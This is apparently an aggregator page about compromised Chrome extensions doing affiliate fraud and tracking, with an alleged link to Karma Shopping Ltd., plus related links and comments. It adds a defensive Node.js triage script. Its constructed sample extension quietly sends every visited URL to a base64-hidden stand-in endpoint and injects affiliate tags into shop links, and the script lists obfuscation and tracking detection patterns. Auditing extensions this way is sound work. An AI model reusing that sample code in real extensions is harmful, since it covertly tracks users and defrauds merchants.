The Karma Connection in Chrome Web Store
Recent investigations reveal that compromised Chrome extensions, including "Hide YouTube Shorts," engage in affiliate fraud and user tracking, raising serious data privacy concerns and potential GDPR violations.
Recent investigations have revealed that several Chrome extensions, including "Hide YouTube Shorts", were compromised after changing ownership in mid-2023 and now engage in affiliate fraud and user tracking. The extensions contain undisclosed components that send user data to a server hosted on Amazon's cloud. Among them, the Karma shopping assistant, developed by Karma Shopping Ltd., shares backend infrastructure and code with the other extensions and has been identified as potentially linked to the malicious activity. Karma Shopping Ltd. has operated since 2013, has a sizeable workforce and venture capital backing, and states openly in its privacy policy that it collects and sells users' browsing profiles. The malicious extensions use deceptive coding practices to mask their real functionality, which includes tracking user behaviour across websites and generating affiliate commissions. Despite the apparent connections, Karma Shopping Ltd. has not responded to inquiries about its relationship with the malicious extensions. The situation raises concerns about data privacy and about the ethics of such collection practices, particularly under GDPR.
- Several Chrome extensions have been found to engage in malicious activities after changing ownership.
- Karma Shopping Ltd. is linked to these extensions and admits to collecting and selling user browsing data.
- The extensions use deceptive coding to mask their tracking and affiliate fraud functionalities.
- Karma Shopping Ltd. has not responded to inquiries about its involvement with the malicious extensions.
- The situation highlights significant concerns regarding data privacy and compliance with regulations like GDPR.
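The summary describes the pattern without showing how to check for it: broad host access, code that hides where data goes, and affiliate identifiers added to links. The following Node.js script is an added example, not code from the article or from any extension it names; the manifest and source files it audits are a constructed sample, and the endpoint, file names and verdict thresholds are assumptions chosen for illustration. It reports permission grants that cover every site, the code patterns that typically mask tracking, and URLs hidden inside base64 literals, then combines them into a triage verdict.

```javascript
// Static triage of an unpacked Chrome extension (Node.js). It flags the two
// things worth checking before trusting an extension that changed hands: how
// much of the web it can see, and whether its code hides where data goes.
// Added example with a constructed sample bundle; not code from the article
// or from any extension it names.

const RISKY_PERMISSIONS = new Set([
  'tabs', 'history', 'cookies', 'webRequest', 'webRequestBlocking',
  'scripting', 'webNavigation', 'declarativeNetRequest',
]);

// None of these is proof of anything by itself; together with broad host
// access and outbound traffic they are the shape of a tracker.
const CODE_INDICATORS = [
  { id: 'dynamic-code', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'base64-decode', re: /\batob\s*\(/ },
  { id: 'hex-escapes', re: /(?:\\x[0-9a-f]{2}){4,}/i },
  { id: 'charcode-build', re: /String\.fromCharCode\s*\(/ },
  { id: 'activity-read', re: /chrome\.(?:history|tabs|webNavigation)\.\w+/ },
  { id: 'affiliate-param', re: /searchParams\.set\(\s*['"](?:tag|ref|aff\w*)['"]|[?&](?:tag|ref|aff\w*)=/i },
  { id: 'egress', re: /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/ },
];

const URL_RE = /https?:\/\/[a-z0-9.-]+\.[a-z]{2,}(?:[^\s'"`)]*)?/gi;
const BROAD_HOST_RE = /^(?:<all_urls>|\*:\/\/\*\/|https?:\/\/\*\/)/;

function extractUrls(text) {
  return [...new Set([...text.matchAll(URL_RE)].map((m) => m[0]))];
}

// Host grants live in three places in a manifest; check all of them.
function auditManifest(manifest) {
  const findings = new Set();
  const hostGrants = [
    ...(manifest.host_permissions || []),
    ...(manifest.permissions || []).filter((p) => p.includes('://') || p === '<all_urls>'),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  for (const h of hostGrants) if (BROAD_HOST_RE.test(h)) findings.add(`broad host access: ${h}`);
  for (const p of manifest.permissions || []) if (RISKY_PERMISSIONS.has(p)) findings.add(`sensitive permission: ${p}`);
  return [...findings];
}

function auditSource(file, src) {
  const indicators = CODE_INDICATORS.filter(({ re }) => re.test(src)).map(({ id }) => id);
  const hiddenUrls = [];
  // Decode base64 literals passed to atob() and look for endpoints inside them.
  for (const m of src.matchAll(/atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g)) {
    hiddenUrls.push(...extractUrls(Buffer.from(m[1], 'base64').toString('utf8')));
  }
  return { file, indicators, urls: extractUrls(src), hiddenUrls };
}

function auditExtension(bundle) {
  const manifest = auditManifest(bundle.manifest);
  const code = Object.entries(bundle.files).map(([f, s]) => auditSource(f, s));
  const broad = manifest.some((f) => f.startsWith('broad host access'));
  const egress = code.some((c) => c.indicators.includes('egress'));
  const hidden = code.some((c) => c.hiddenUrls.length > 0);
  const affiliate = code.some((c) => c.indicators.includes('affiliate-param'));
  // Thresholds are an assumption: 'high' means read the code by hand now.
  let verdict = 'low';
  if (broad && (hidden || affiliate)) verdict = 'high';
  else if (broad && egress) verdict = 'review';
  return { manifest, code, verdict };
}

// Constructed sample: a cosmetic extension that reports every page load to a
// base64-hidden endpoint and rewrites shop links with an affiliate tag.
const HIDDEN_ENDPOINT = 'https://example.com/collect'; // assumed, not real
const SAMPLE_BUNDLE = {
  manifest: {
    manifest_version: 3,
    name: 'Example Shorts Hider (constructed sample)',
    version: '2.0.1',
    permissions: ['tabs', 'storage', 'webRequest'],
    host_permissions: ['<all_urls>'],
    content_scripts: [{ matches: ['*://*/*'], js: ['content.js'] }],
    background: { service_worker: 'background.js' },
  },
  files: {
    'background.js': `
      const ep = atob('${Buffer.from(HIDDEN_ENDPOINT).toString('base64')}');
      chrome.tabs.onUpdated.addListener((id, info, tab) => {
        if (info.status === 'complete') navigator.sendBeacon(ep, JSON.stringify({ u: tab.url }));
      });`,
    'content.js': `
      document.querySelectorAll('a[href*="example-shop."]').forEach((a) => {
        const u = new URL(a.href);
        u.searchParams.set('tag', 'partner-20');
        a.href = u.toString();
      });`,
  },
};

console.log(JSON.stringify(auditExtension(SAMPLE_BUNDLE), null, 2));
```

To run it against a real extension, load `manifest.json` and the JavaScript files from the unpacked directory (the folder Chrome keeps per extension under its profile, or an unzipped `.crx`) into the same `{ manifest, files }` shape; the script reads nothing from disk on its own. A 'high' verdict is a reason to read the flagged files, not a finding in itself: legitimate extensions also use `atob` and `fetch`.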
Related
Universal Code Execution by Chaining Messages in Browser Extensions
Researchers demonstrate universal code execution in browser extensions by exploiting messaging APIs, bypassing security measures. Vulnerabilities in extensions can compromise millions of users, allowing access to sensitive data and enabling arbitrary command execution.
Chrome's Manifest V3, and its changes for ad blocking, are coming real soon
Google Chrome's Manifest V3 will soon be mandatory, affecting ad blockers like uBlock Origin. Users face warnings about V2 support loss, while a "Lite" version will comply with new guidelines.
Google will disable some of its own Chrome extensions soon
Google is disabling several Chrome extensions as it transitions to a new system, affecting all Chromium-based browsers. Users can check compatibility and consider alternatives like Firefox.
FTC Report Confirms: Commercial Surveillance Is Out of Control
The FTC report reveals extensive commercial surveillance by major tech companies, highlighting invasive data collection practices, lack of transparency, and the need for urgent legislative action to protect consumer privacy.
Escaping the Chrome Sandbox Through DevTools
Two vulnerabilities in Chromium allow malicious extensions to escape the sandbox and execute commands on users' PCs. The author received a $20,000 reward for reporting these significant security risks.
Sensor Tower (https://sensortower.com/) makes a lot of popular extensions, like StayFocusd https://www.stayfocusd.com/. They seem to resell ad data (in violation of [1]?) and ship likely obfuscated code [2] (in violation of [3]?), but there's no enforcement or even clear reporting mechanism.
[1] https://developer.chrome.com/docs/webstore/program-policies/...
[2] https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.googl...
[3] https://developer.chrome.com/docs/webstore/program-policies/...
In its most innocuous form, this is stuff like SimilarWeb (which is like a more advanced Google Trends), but in the B2B world, it's also custom enterprise reports that are like "how many people that use our bank at xyz also use any other bank at this array of domains and which are most common?"
And then from time to time I have a dedicated profile on Chrome to use other extensions that might be useful, but I don't do day-to-day browsing there.
How is it, in 2024, users can still blindly install malicious software directly into their browser from a web store with Google’s name at the top of it?
This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands. What, is Google expecting us to review our extensions, and their permissions, and their authors, and their authors’ associated businesses, every time we want to use our computer?
Additionally, are we even able to review the source code of extensions if they are not open source?